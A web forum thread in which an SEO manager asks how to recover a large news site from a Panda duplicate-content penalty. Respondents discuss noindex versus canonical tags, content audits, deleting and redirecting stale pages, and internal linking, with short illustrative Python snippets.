Removing duplicated content using only NOINDEX at large scale (80% of the website).
-
Hi everyone,
I am taking care of a large "news" website (500k pages), which took a massive hit from Panda because of duplicated content (70% was syndicated content). I recommended that all syndicated content be removed and that the website focus on original, high-quality content.
However, this was implemented only partially. All syndicated content is set to NOINDEX (they think it is good for users to see standard news plus original HQ content). Of course, it didn't help at all. No change after months. If I were Google, I would definitely penalize a website that has 80% of its content set to NOINDEX because it is duplicated. I would consider this site to be "cheating" and not worthy of the user.
What do you think about this "theory"? What would you do?
Thank you for your help!
-
-
It has been almost a year now since the massive hit. After that, there were also some smaller hits.
-
We are putting effort into improvements. That is quite frustrating for me, because I believe that our effort is undermined by the old duplicated content (which makes up 80% of the website :-))
Yeah, we will need to take care of the link mess...
Thank you!
-
Yeah, this strategy will definitely be part of the guidelines for the editors.
One last question: do you know of any good resources I can use for inspiration?
Thank you so much..
-
We deleted thousands of pages every few months.
Before deleting anything we identified valuable pages that continued to receive traffic from other websites or from search. These were often updated and kept on the site. Everything else was 301 redirected to the "news homepage" of the site. This was not a news site, it was a very active news section on an industry portal site.
"You set 410 for those pages and removed all internal links to them, and Google was OK with that?"
Our goal was to avoid internal links to pages that were going to be deleted. Our internal "story recommendation" widgets would stop showing links to pages after a certain length of time. Our periodic purges were done after that length of time.
We never used hard coded links in stories to pages that were subject to being abandoned. Instead we simply linked to category pages where something relevant would always be found.
Develop a strategy for internal linking that will reduce site maintenance and focus all internal links to pages that are permanently maintained.
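As a rough illustration of the widget behaviour described above, here is a minimal Python sketch. The 90-day window, the `Story` fields, and the `evergreen` flag are all assumptions made for the example, not details of the site in question.

```python
from dataclasses import dataclass
from datetime import date, timedelta

# Hypothetical cutoff: stories older than this are no longer recommended.
LINK_WINDOW = timedelta(days=90)


@dataclass
class Story:
    url: str
    published: date
    evergreen: bool = False  # permanently maintained pages stay linkable


def linkable_stories(stories, today, window=LINK_WINDOW):
    """Stories the recommendation widget may still link to."""
    return [s for s in stories if s.evergreen or today - s.published <= window]


def purge_candidates(stories, today, window=LINK_WINDOW):
    """Stories that have aged out of the widget and can be reviewed for deletion."""
    return [s for s in stories if not s.evergreen and today - s.published > window]
```

Because the purge list is built from the same window as the widget, a page should only come up for deletion after the widget has already stopped linking to it.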
-
Yikes! Will you guys still pay for it if it's removed? If so, then combining the comments below with my thoughts, I'd delete it, since it's old and not time-relevant.
-
Yeah, paying ... we actually pay for this content (earlier management decisions :-))
-
EGOL, your insights are very much appreciated :-)!
I agree with you. Makes total sense.
So you didn't experience any problems removing outdated content (or "content with no traffic value") from your website? You set 410 for those pages and removed all internal links to them, and Google was OK with that?
Redirecting useless content: do you mean setting a 301 to the most relevant page that is bringing in traffic?
Thank you sir
-
But I still miss the point of paying for the content that is not accessible from SE
- "paying"?
Is my understanding right that if I set a canonical for these duplicates, Google has no reason to show these pages in the SERP?
- correct
-
Hi Dimitrii,
thank you very much for your opinion. The idea of canonical links is very interesting. We may try that in the "first" phase. But I still miss the point of paying for content that is not accessible from search engines.
Is my understanding right that if I set a canonical for these duplicates, Google has no reason to show these pages in the SERP?
-
Just seeing the other responses. Agree with what EGOL mentions. A content audit would be even better to see if there was any value at all on those pages (GA traffic, links, etc). Odds are though that there was not any and you already killed all of it with the noindex tag in place.
-
Couple of things here.
-
If a second Panda update has not occurred since the changes that were made then you may not get credit for the noindexed content. I don't think this is "cheating" as with the noindex, it just told Google to take 350K of its pages out of the index. The noindex is one of the best ways to get your content out of Google's index.
-
If you have not spent time improving the non-syndicated content then you are missing the more important part and that is to improve the quality of the content that you have.
A side point to consider here, is your crawl budget. I am assuming that the site still internally links to these 350K pages and so users and bots will go to them and have to process etc. This is mostly a waste of time. As all of these pages are out of Google's index thanks to the noindex tag, why not take out all internal links to those pages (i.e. from sitemaps, paginated index pages, menus, internal content) so that you can have the user and Google focus on the quality content that is left over. I would then also 404/410 all those low quality pages as they are now out of Google's index and not linked internally. Why maintain the content?
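To make the "take out all internal links, then 404/410" step a bit more concrete, here is a hedged Python sketch using only the standard library. The function names, the `retired_paths` set, and the example.com URLs are hypothetical; a real site would wire this into its own CMS or web server.

```python
from html.parser import HTMLParser
from http import HTTPStatus
from urllib.parse import urljoin, urlparse


class LinkCollector(HTMLParser):
    """Collects absolute URLs from <a href="..."> tags on one page."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(urljoin(self.base_url, href))


def links_to_retired(html, page_url, retired_paths):
    """Internal links on a page that still point at retired pages."""
    collector = LinkCollector(page_url)
    collector.feed(html)
    return [link for link in collector.links if urlparse(link).path in retired_paths]


def status_for(path, retired_paths):
    """Answer 410 Gone for retired pages, 200 OK otherwise."""
    return HTTPStatus.GONE if path in retired_paths else HTTPStatus.OK


def sitemap_urls(all_urls, retired_paths):
    """Keep only URLs whose path has not been retired."""
    return [u for u in all_urls if urlparse(u).path not in retired_paths]
```

Running `links_to_retired` over menus, index pages, and story templates before switching on the 410 gives a list of links to clean up first, so neither users nor bots get sent to dead pages.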
-
-
Good point! News gotta be new
-
If there are 500,000 pages of "news" then a lot of that content is "history" instead of "news". Visitors are probably not consuming it. People are probably not searching for it. And actively visited pages on the site are probably not linking to it.
So, I would use analytics to determine if these "history" pages are being viewed, are pulling in much traffic, have very many links, and I would delete and redirect them if they are not important to the site any longer. This decision is best made at the page level.
For "unique content" pages that appear only on my site, I would assess them at regular intervals to determine which ones are pulling in traffic and which ones are not. Some sites place news in folders according to their publication dates and that facilitates inspecting old content for its continued value. These pages can then be abandoned and redirected once their content is stale and not being consumed. Again, this can best be done at the page level.
I used to manage a news section and every few months we would assess, delete and redirect, to keep the weight of the site as low as possible for maximum competitiveness.
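A page-level check along these lines could be sketched as follows. The thresholds and the `PageStats` fields are purely illustrative assumptions; the real numbers would come from your own analytics and link data.

```python
from dataclasses import dataclass


@dataclass
class PageStats:
    url: str
    pageviews: int       # views in the review period
    search_visits: int   # visits arriving from search
    inbound_links: int   # links from other websites


def audit(page, min_pageviews=50, min_search_visits=10, min_links=1):
    """Return "keep" if the page still earns attention, else "delete_and_redirect"."""
    still_valuable = (
        page.pageviews >= min_pageviews
        or page.search_visits >= min_search_visits
        or page.inbound_links >= min_links
    )
    return "keep" if still_valuable else "delete_and_redirect"


def audit_all(pages, **thresholds):
    """Map each URL to its audit decision."""
    return {p.url: audit(p, **thresholds) for p in pages}
```

A page that passes any one test is kept, which errs on the side of not deleting something that still has links or search traffic.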
-
Hi there.
NOINDEX !== no crawling, and it surely doesn't equal NOFOLLOW. What you should probably be looking at is canonical links.
My understanding is (and I can be completely wrong) that when you get hit by Panda for duplicate content and then try to recover, Google checks your website for the same duplicate content. It's still crawlable, all the links are still "followable", it's still scraped content, and you aren't telling crawlers that you took it from somewhere else (by canonicalizing); it's just not displayed in SERPs. And yes, having 80% of the content set to noindex probably doesn't help either.
So, I think what you need to do is either remove that duplicate content altogether, or use canonical links to the originals, or (bad idea, but it would work) block all those links in robots.txt (at least this way those pages will become completely uncrawlable). All of these are still disreputable techniques though, kind of like polishing dirt.
Hope this makes sense.
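To show the difference between the signals mentioned above, here is a small Python sketch that reads the robots meta tag and the canonical link from a page's HTML. It uses only the standard library; the class and function names and the original.example URL are made up for the example.

```python
from html.parser import HTMLParser


class IndexingSignals(HTMLParser):
    """Records robots meta directives and the canonical URL of one page."""

    def __init__(self):
        super().__init__()
        self.robots = set()
        self.canonical = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("name") or "").lower() == "robots":
            content = a.get("content") or ""
            self.robots |= {token.strip().lower() for token in content.split(",")}
        elif tag == "link" and (a.get("rel") or "").lower() == "canonical":
            self.canonical = a.get("href")


def indexing_signals(html):
    """Summarise what the page tells crawlers about indexing and origin."""
    parser = IndexingSignals()
    parser.feed(html)
    return {
        "noindex": "noindex" in parser.robots,
        "nofollow": "nofollow" in parser.robots,
        "canonical": parser.canonical,
    }
```

A syndicated page that reports `noindex` with no canonical is hidden from results but says nothing about where the content came from; a canonical pointing at the original publisher is the signal that does.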